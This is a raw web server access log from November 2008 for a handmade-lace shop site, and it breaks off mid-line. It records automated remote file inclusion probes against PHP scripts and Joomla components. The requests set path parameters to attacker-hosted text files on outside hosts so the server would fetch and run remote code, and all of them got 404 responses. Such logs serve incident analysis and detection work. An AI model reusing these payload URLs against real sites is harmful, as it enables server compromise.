83.2.108.2 - - [22/Nov/2008:05:20:52 -0800] "GET /logs/send_reminders.php?includedir=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.handmadelaces.com"
83.2.108.2 - - [22/Nov/2008:05:20:52 -0800] "GET /send_reminders.php?includedir=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.handmadelaces.com"
61.7.235.75 - - [22/Nov/2008:05:20:56 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.handmadelaces.com"
88.45.97.18 - - [22/Nov/2008:05:21:00 -0800] "GET /m2f/m2f_phpbb204.php?m2f_root_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.handmadelaces.com"
88.45.97.18 - - [22/Nov/2008:05:21:01 -0800] "GET /logs/m2f/m2f_phpbb204.php?m2f_root_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.handmadelaces.com"
88.45.97.18 - - [22/Nov/2008:05:21:15 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.handmadelaces.com"
88.45.97.18 - - [22/Nov/2008:05:21:15 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.handmadelaces.com"
61.7.235.75 - - [22/Nov/2008:05:21:33 -0800] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.handmadelaces.com"
61.7.235.75 - - [22/Nov/2008:05:21:35 -0800] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.handmadelaces.com"
165.98.224.194 - - [22/Nov/2008:05:21:42 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.green-villa.tw//appserv/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
165.98.224.194 - - [22/Nov/2008:05:21:42 -0800] "GET /logs/access_081016.log//include/admin.lib.inc.php?site_path=http://www.green-villa.tw//appserv/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
211.76.137.5 - - [22/Nov/2008:05:21:45 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.handmadelaces.com"
211.76.137.5 - - [22/Nov/2008:05:21:45 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.handmadelaces.com"
202.125.38.99 - - [22/Nov/2008:05:21:46 -0800] "GET /logs/access_081106.log/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.handmadelaces.com"
165.98.224.194 - - [22/Nov/2008:05:21:52 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.green-villa.tw//appserv/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
85.43.93.220 - - [22/Nov/2008:05:22:39 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.handmadelaces.com"
211.76.137.5 - - [22/Nov/2008:05:22:41 -0800] "GET /send_reminders.php?includedir=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.handmadelaces.com"
211.76.137.5 - - [22/Nov/2008:05: